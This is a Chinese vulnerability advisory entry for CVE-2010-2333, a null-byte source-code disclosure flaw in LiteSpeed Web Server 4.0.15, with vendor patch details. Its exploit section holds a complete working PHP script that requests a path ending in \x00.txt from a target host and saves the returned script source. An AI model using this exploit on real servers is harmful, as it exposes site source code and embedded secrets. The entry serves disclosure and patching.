LiteSpeed Web Server HTTP请求源码泄露漏洞


添加时间:
2010-07-01

系统编号:
WAVDB-01673
BugCVE: CVE-2010-2333
BUGTRAQ: 40815

影响版本:
LiteSpeed Web Server 4.0.15

程序介绍:

LiteSpeed Web Server是一款高性能的web服务器。

漏洞分析:

LiteSpeed Web Server没有正确地处理HTTP请求,用户可以将所请求的扩展名更改为\x00.txt导致从返回中读取某些脚本(如PHP)的源码。

漏洞利用:

 
  1. <?php  
  2. /* 
  3. * LiteSpeed Web Server Remote Source Code Disclosure Exploit 
  4. * Usage        : php exploit.php domain.com /path 
  5. * example    : php exploit.php burtay.org index.php 
  6. * Coded By Burtay 
  7. * Special Thanks RMx And Megaturks Crews 
  8. */  
  9. echo "\n ->LiteSpeed Web Server Remote Source Code Disclosure Exploit<-\n\nStarting\n";  
  10. $fp = fsockopen($argv[1], 80, $errno$errstr, 30);  
  11. if (!$fp)   
  12.     {  
  13.     echo "$errstr ($errno)<br />\n";  
  14.     }   
  15.     else {  
  16.     $out = "GET /".$argv[2]."\x00.txt HTTP/1.1\r\n";  
  17.     $out .= "Host: ".$argv[1]."\r\n";  
  18.     $out .= "Connection: Close\r\n\r\n";  
  19.     fwrite($fp$out);  
  20.     while (!feof($fp)) {  
  21.         $gelen     = fgets($fp, 128);  
  22.         $ac        = fopen($argv[2],'ab');  
  23.         fwrite($ac,$gelen);  
  24.         fclose($ac);  
  25.     }  
  26.     echo "Dosya ".$argv[2]." ad? ile kaydedildi\n";  
  27.     echo "Coded By Burtay\n";  
  28.     echo "Burtay.Org\n";  
  29.     echo "Megaturks.Net\n";  
  30.     fclose($fp);  
  31. }  
  32. ?>  
 

解决方案:
厂商补丁:
LiteSpeed Technologies
----------------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.litespeedtech.com/lat ... .0.15-released.html

信息来源:
<*来源:Kingcope (kingcope@gmx.net)
链接:http://secunia.com/advisories/40128/
http://marc.info/?l=full-disclosure&m=127643766428142&w=2
*>